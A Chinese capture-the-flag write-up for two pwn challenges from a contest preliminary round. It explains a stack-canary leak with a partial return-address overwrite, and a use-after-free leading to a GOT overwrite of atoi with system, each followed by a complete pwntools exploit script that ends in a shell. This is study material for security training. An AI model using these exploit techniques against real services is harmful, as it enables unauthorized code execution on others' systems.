铁三初赛PWN Wp


铁三初赛PWN

多亏师傅们带飞,本次排名第四赛区第二,排名如下^_^


pwn1[namepie]

ssize_t sub_9A0()
{
char s; // [rsp+0h] [rbp-30h]  -- decompiler shows one char, but it is used as a 0x30-byte stack buffer (rbp-0x30 .. rbp-8)
unsigned __int64 v2; // [rsp+28h] [rbp-8h]  -- stack-canary slot, exactly 0x28 bytes above s

v2 = __readfsqword(0x28u); // load the canary
memset(&s, 0, 0x1EuLL); // only 0x1E of the 0x30 bytes are zeroed
puts("Input your Name:");
read(0, &s, 0x30uLL); // vul: 0x30 bytes run from s up to and over the canary slot at s+0x28
printf("hello %s: and what do your want to sey!\n", &s); // %s keeps printing past s if its terminating NUL (the canary's low byte) was overwritten
return read(0, &s, 0x60uLL); // vul2: stack overflow -- 0x60 bytes reach beyond the canary, saved rbp and return address
}

前言

程序留了后门函数,保护全开

思路

先使用第一次输入泄露canary,然后再使用第二次输入覆盖return地址的低字节为后门函数地址,打通几率1 / 16

EXP

#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: i0gan
# Env: Linux arch 5.8.14-arch1-1

from pwn import *
import os

# Thin wrappers around the pwntools tube `io`; `io` is bound later in __main__
# and is looked up at call time, so definition order does not matter.
def r(x):
    """Receive exactly x bytes."""
    return io.recv(x)


def ra():
    """Receive everything until EOF."""
    return io.recvall()


def rl():
    """Receive one line, newline kept."""
    return io.recvline(keepends=True)


def ru(x):
    """Receive up to delimiter x; the delimiter itself is dropped."""
    return io.recvuntil(x, drop=True)


def s(x):
    """Send raw bytes."""
    return io.send(x)


def sl(x):
    """Send x followed by a newline."""
    return io.sendline(x)


def sa(x, y):
    """Wait for x, then send y."""
    return io.sendafter(x, y)


def sla(x, y):
    """Wait for x, then send y plus a newline."""
    return io.sendlineafter(x, y)


def ia():
    """Hand the tube over to the user."""
    return io.interactive()


def c():
    """Close the tube."""
    return io.close()


def li(x):
    """Log x at INFO level, wrapped in 256-colour code 214."""
    return log.info(''.join(['\x1b[01;38;5;214m', x, '\x1b[0m']))


context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

elf_path = 'pwn'
libc_path = './libc.so.6'

# remote target: contest-internal address and port
server_ip = "172.20.14.177"
server_port = 9999

# LOCAL=1: run elf_path via elf.process() (db() can then attach gdb);
# LIBC=1: additionally preload libc_path into that process.
LOCAL = 0
LIBC = 0

#--------------------------func-----------------------------
def db():
    """Attach gdb to the running target; a no-op unless LOCAL is set."""
    if not LOCAL:
        return
    gdb.attach(io)


#--------------------------exploit--------------------------
def exploit():
    """First input leaks the stack canary; second input rewrites the low bytes of the return address."""
    li('exploit...')
    # 0x28 bytes of padding reach the canary slot; the trailing 0x01 replaces the
    # canary's low (zero) byte so the program's printf("%s") does not stop there.
    p = 'A' * 0x28 + '\x01'
    s(p)
    # Discard everything up to our 0x01, then take the canary's remaining 7 bytes
    # and put its known zero low byte back.
    ru('\x01')
    cannary = u64('\x00' + r(7))
    li('cannary: ' + hex(cannary))
    # Second input: padding, the intact canary, a dummy saved rbp, then only the two
    # low bytes of the return address (the partial overwrite the writeup describes,
    # hence its stated 1/16 success rate).
    p = 'A' * 0x28
    p += p64(cannary)
    p += p64(0)
    p += '\x71\xaa'
    #db()
    s(p)


def finish():
    """Drop into an interactive session, then close the tube."""
    io.interactive()
    io.close()

#--------------------------main-----------------------------
if __name__ == '__main__':
    # The ELF is parsed first in both modes; only the tube differs.
    elf = ELF(elf_path)
    if LOCAL:
        if LIBC:
            libc = ELF(libc_path)
            io = elf.process(env={"LD_PRELOAD": libc_path})
        else:
            io = elf.process()
    else:
        io = remote(server_ip, server_port)
        if LIBC:
            libc = ELF(libc_path)

    exploit()
    finish()

pwn2 [onetime]

前言

pie保护没开,一个菜单堆题,在添加、删除和编辑都采用相应的标志来避免重复的第二次操作。漏洞点在释放内存后没有将数据指针清0,还有其他操作没有做好相应的检查,造成uaf漏洞。

思路

通过uaf漏洞,打入bss段的buf附近,修改edit_flag为0以便再次使用修改功能,同时修改buf为atoi的plt.got地址,然后再通过uaf漏洞泄露libc,再次修改atoi的got中数据为libc中system函数地址,在输入选项时输入'sh\x00'即可获得shell

EXP

#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: i0gan
# Env: Linux arch 5.8.14-arch1-1

from pwn import *
import os

# Thin wrappers around the pwntools tube `io`; `io` is bound later in __main__
# and is looked up at call time, so definition order does not matter.
def r(x):
    """Receive exactly x bytes."""
    return io.recv(x)


def ra():
    """Receive everything until EOF."""
    return io.recvall()


def rl():
    """Receive one line, newline kept."""
    return io.recvline(keepends=True)


def ru(x):
    """Receive up to delimiter x; the delimiter itself is dropped."""
    return io.recvuntil(x, drop=True)


def s(x):
    """Send raw bytes."""
    return io.send(x)


def sl(x):
    """Send x followed by a newline."""
    return io.sendline(x)


def sa(x, y):
    """Wait for x, then send y."""
    return io.sendafter(x, y)


def sla(x, y):
    """Wait for x, then send y plus a newline."""
    return io.sendlineafter(x, y)


def ia():
    """Hand the tube over to the user."""
    return io.interactive()


def c():
    """Close the tube."""
    return io.close()


def li(x):
    """Log x at INFO level, wrapped in 256-colour code 214."""
    return log.info(''.join(['\x1b[01;38;5;214m', x, '\x1b[0m']))


context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

elf_path = 'pwn'
MODIFY_LD = 0
arch = '64'
libc_v = '2.23'

# Local glibc tree laid out as /glibc/<version>/<arch>/lib/...
glibc_lib = '/glibc/' + libc_v + '/' + arch + '/lib'
ld_path = glibc_lib + '/ld-linux-x86-64.so.2'
libs_path = glibc_lib
libc_path = glibc_lib + '/libc.so.6'
libc_path = './libc.so.6'  # overrides the line above: the libc next to the script is the one actually used

# With MODIFY_LD set, the script only repoints the binary's interpreter and exits.
if MODIFY_LD:
    # Both command strings are built from the module-level constants above and go
    # through a shell via os.system(); keep externally supplied paths out of them.
    os.system('cp %s %s.bk' % (elf_path, elf_path))
    change_ld_cmd = 'patchelf --set-interpreter %s %s' % (ld_path, elf_path)
    os.system(change_ld_cmd)
    li('modify ld ok!')
    exit(0)

# remote target: contest-internal address and port
server_ip = "172.20.14.177"
server_port = 10001

# LOCAL=1: run elf_path via elf.process() (db() can then attach gdb);
# LIBC=1: load libc_path (and preload it into a local process).
LOCAL = 0
LIBC = 1


#--------------------------func-----------------------------
def db():
    """Attach gdb to the running target; a no-op unless LOCAL is set."""
    if not LOCAL:
        return
    gdb.attach(io)

def ad():
    """Pick menu option 1 (the add operation, per the writeup)."""
    io.sendlineafter('>>', '1')

def fi(d):
    """Pick menu option 2, then send d at the ':' prompt (presumably the edit/fill operation)."""
    io.sendlineafter('>>', '2')
    io.sendafter(':', d)

def dp():
    """Pick menu option 3; exploit() reads its output, so presumably the display operation."""
    io.sendlineafter('>>', '3')

def rm():
    """Pick menu option 4 (the delete operation, per the writeup)."""
    io.sendlineafter('>>', '4')

def lv(d):
    """Pick menu option 5, then send d at the ':' prompt; exact semantics not shown in this file."""
    io.sendlineafter('>>', '5')
    io.sendafter(':', d)

#--------------------------exploit--------------------------
def exploit():
    """UAF on a freed chunk -> write near bss buf/edit_flag -> leak libc through atoi@got -> atoi@got = system."""
    li('exploit...')
    ad()
    rm()
    # The chunk is freed but its pointer survives (the UAF the writeup describes),
    # so this write lands in the freed chunk; the value points 0x10 past 0x60207d,
    # into the bss area near buf.
    p = p64(0x60207d + 0x10)
    fi(p)
    ad()

    # 3 filler bytes, then edit_flag := 0 (re-enables editing) and buf := &atoi@got.
    p = 'A' * 3
    p += p64(0)
    p += p64(elf.got['atoi'])
    lv(p)

    # Print buf (now atoi@got). The pointer is presumably emitted as a string, so
    # only its 5 low bytes precede the '\x7f'; that byte and the two zero high
    # bytes are appended back before u64.
    dp()
    leak = u64(ru('\x7f')[-5:] + '\x7f\x00\x00')
    libc_base = leak - libc.sym['atoi']
    system = libc_base + libc.sym['system']
    li('libc_base: ' +hex(libc_base))

    # Overwrite atoi@got with system; the next menu read hands 'sh' to it.
    fi(p64(system))
    #db()
    s('sh\x00')

def finish():
    """Drop into an interactive session, then close the tube."""
    io.interactive()
    io.close()

#--------------------------main-----------------------------
if __name__ == '__main__':
    # The ELF is parsed first in both modes; only the tube differs.
    elf = ELF(elf_path)
    if LOCAL:
        local_env = {"LD_LIBRARY_PATH": libs_path}
        if LIBC:
            libc = ELF(libc_path)
            local_env["LD_PRELOAD"] = libc_path
        io = elf.process(env=local_env)
    else:
        io = remote(server_ip, server_port)
        if LIBC:
            libc = ELF(libc_path)

    exploit()
    finish()
